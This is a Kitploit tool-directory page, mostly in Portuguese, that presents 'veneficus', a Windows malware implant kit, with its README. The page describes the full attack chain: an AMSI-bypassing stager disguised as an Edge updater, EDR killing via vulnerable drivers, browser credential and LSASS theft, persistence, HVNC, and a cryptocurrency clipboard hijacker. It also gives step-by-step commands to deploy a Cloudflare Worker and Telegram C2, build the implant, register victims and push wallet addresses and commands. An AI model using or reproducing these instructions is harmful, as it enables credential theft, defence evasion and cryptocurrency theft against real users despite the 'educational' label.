Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
veneficus — Implante 0day ponta a ponta super elite. Cadeia de ataque completa. Explorar, escalar, pivotar, envenenar, persistência. | Kitploit
Ferramentas/GitHubGitHub/abraxas/veneficus
Escalada de PrivilégiosMecanismos de PersistênciaEvasão de IDS/IPSMovimento LateralExfiltração de DadosPós-ExploraçãoAnálise de MalwareComando e ControleRed TeamingDesenvolvimento de PayloadsCavalo de Troia de Acesso Remoto
218há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
GitHubabraxas/veneficus

veneficus

Implante 0day ponta a ponta super elite. Cadeia de ataque completa. Explorar, escalar, pivotar, envenenar, persistência.

Ver Repositório

ABRAXAS LABS — analyze · reverse · disclose

@abraxas_null · [email protected] · abraxaslabs.tech · github.com/abraxas/veneficus
Crédito: @YoSoth0

Veneficus Mini v3.0

Kit de implante para Windows 10/11 x64: um stager em PowerShell, um PE em Rust e um Cloudflare Worker que aciona o operador no Telegram.

O stager (resources/loader.ps1) tem como objetivo silenciar o AMSI no processo PowerShell atual, baixar o implante da rota /beacon do Worker e executá-lo como %TEMP%\MicrosoftEdgeUpdate.exe. O PE então pontua o host em busca de artefatos de sandbox/analista. Uma pontuação alta apaga o binário; uma pontuação média entra em "modo seguro" (apenas fingerprint); uma pontuação baixa executa a pilha completa — patches de AMSI/ETW, um pool BYOVD contra processos EDR nomeados, roubo de credenciais de navegador, uma cadeia de dump do LSASS, persistência via WMI/tarefa agendada/Run, um proxy SOCKS5 em localhost, um listener HVNC/RFB em localhost e um clipper de área de transferência para endereços de criptomoedas. Um loop HTTPS com jitter faz beacon e consulta um pequeno conjunto de comandos (/status, /proxy_on, /self_destruct, /re_infect, /sleep, alternâncias de modo seguro). A exfiltração é AES-256-GCM com HMAC, com chave derivada de um UUID embutido em tempo de compilação; o Worker deve encaminhar o texto cifrado sem possuir a chave.

Este repositório é publicado para educação e análise. Uma leitura arquivo por arquivo do que está implementado versus o que é stub está em VENEFICUS_MINI_v3_DEEP_ANALYSIS.md.

Apenas para fins educacionais. 2026 Todos os direitos revertidos.


Arquitetura

VICTIM MACHINE
  loader.ps1 (AMSI/ETW bypass → download → execute)
    └── veneficus_mini.exe
          ├── Environment assessment (sandbox/VM/analyst detection)
          ├── Stealth: syscall bypass chain, lacuna stack-spoof, DKOM, AMSI/ETW patch
          ├── BYOVD: kill EDR processes (K7RKScan, ThrottleStop, BdApi, TrueSight, wsftprm, RTCore64)
          ├── Payload: creds, cookies, LSASS dump, device fingerprint
          ├── Persistence: WMI / Scheduled Task / Registry (three-way fallback)
          ├── SOCKS5 proxy (127.0.0.1:1080 by default, configurable)
          ├── HVNC (127.0.0.1:5900 by default, configurable)
          ├── Clipper: crypto address hijacking (BTC, ETH, LTC, XMR, DOGE, SOL, XRP, BNB, USDT)
          └── C2 loop: AES-GCM encrypted poll every 10 ± 3s (safe mode: 60 ± 18s)
                ↕ HTTPS
CLOUDFLARE WORKER
  /beacon   → implant download
  /exfil    → receive encrypted data → forward ciphertext to Telegram
  /commands → return queued commands (one-time queue)
  /config   → return operator config blob
  /admin    → queue commands  (requires X-Admin-Key)
  /register → register UUID   (requires X-Admin-Key)
  /unregister → revoke UUID   (requires X-Admin-Key)
  /listing  → list all UUIDs (requires X-Admin-Key)
  /set_config → push config  (requires X-Admin-Key)
                ↓
TELEGRAM BOT
  Receives: ciphertext + nonce + HMAC (operator decrypts offline)

Pré-requisitos

ComponenteComo instalar
Rust + cargocurl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Alvo de compilação cruzada para Windowsrustup target add x86_64-pc-windows-gnu
Cross-linker MinGWsudo apt install mingw-w64
Wrangler (CLI do CF Worker)npm install -g wrangler

Configuração

1. Cloudflare Worker

wrangler login
wrangler init veneficus-relay
# Replace worker.js with cloudflare/worker.js

wrangler secret put TELEGRAM_TOKEN     # from @BotFather
wrangler secret put TELEGRAM_CHAT_ID   # your chat/group ID
wrangler secret put ADMIN_KEY          # random 32-char secret

wrangler kv:namespace create "UUID_KV"
wrangler kv:namespace create "COMMANDS_KV"
wrangler kv:namespace create "CONFIG_KV"

# Add KV bindings to wrangler.toml:
#   [[kv_namespaces]]
#   binding = "UUID_KV"
#   id = "<uuid_kv_id>"
#   (repeat for COMMANDS_KV, CONFIG_KV)

wrangler deploy

2. Gerar a URL do Relay

import base64
url = b"https://your-worker.workers.dev"
key = 0xAF
enc = bytes([b ^ key for b in url])
print(base64.b64encode(enc).decode())   # → set as RELAY_URL_BYTES

3. Compilar

RELAY_URL_BYTES="<output_above>" \
BYOVD_DRIVER_DIR="./drivers" \
TOOLS_DIR="./tools" \
cargo build --release --target x86_64-pc-windows-gnu

Coloque os arquivos .sys de drivers vulneráveis em drivers/ e os binários de ferramentas em tools/ antes de compilar.

4. Registrar o UUID do implante

Leia o UUID do binário (embutido em tempo de compilação):

strings target/x86_64-pc-windows-gnu/release/veneficus_mini.exe | grep -E "[0-9a-f]{8}-[0-9a-f]{4}"

Registre via API de admin:

curl -X POST https://your-worker.workers.dev/register \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","note":"op_blackbird_host01"}'

5. Enviar a configuração do operador (endereços do clipper, etc.)

curl -X POST https://your-worker.workers.dev/set_config \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{
    "implant_uuid": "global",
    "config": {
      "clipper_addresses": {
        "bitcoin":  "bc1qyourwallethere",
        "ethereum": "0xYOURWALLETHERE"
      },
      "reinfect_url": "https://your-worker.workers.dev/beacon"
    }
  }'

Comandos C2

Envie via endpoint /admin:

curl -X POST https://your-worker.workers.dev/admin \
  -H "X-Admin-Key: YOUR_ADMIN_KEY" \
  -H "Content-Type: application/json" \
  -d '{"implant_uuid":"<uuid>","command":"/status"}'
ComandoEfeito
/self_destructWipe de 3 passagens + limpeza do log de eventos + saída
/re_infectBaixa novo payload de reinfect_url na config, substitui a si mesmo
/statusEnvia PID, estado do proxy, modo seguro, UUID de volta ao C2
/proxy_onHabilita o proxy SOCKS5
/proxy_offDesabilita o proxy SOCKS5
/exit_safeSai do modo seguro, retoma a operação completa
/enter_safeEntra no modo seguro (apenas fingerprint)
/sleep <secs>Substitui o intervalo base de poll do C2

Cadeias de Fallback

MóduloCadeia (esquerda = primeiro tentado)
BYOVDK7RKScan → BdApiUtil64 → TrueSight → ThrottleStop → STProcessMonitor → wsftprm → RTCore64 → capcom → desabilitar blocklist
LSASSMiniDumpWriteDump (nativo) → patch WDigest → LSA Whisperer → DumpGuard → bypass PPL (RTCore64)
NTLMPrinterBug → PetitPotam → relay cross-protocol (HTTP→LDAP) → CVE-2025-33073 → relay MSSQL
SyscallsTartarus Gate → Halo's Gate → unhook ntdll → indireto → WinAPI padrão
DKOMunlink EPROCESS → enumeração PspChained → cancelar registro de callback EDR
PersistênciaAssinatura WMI → Tarefa Agendada → chave Run em HKLM

Estrutura de Diretórios

Baixar ferramenta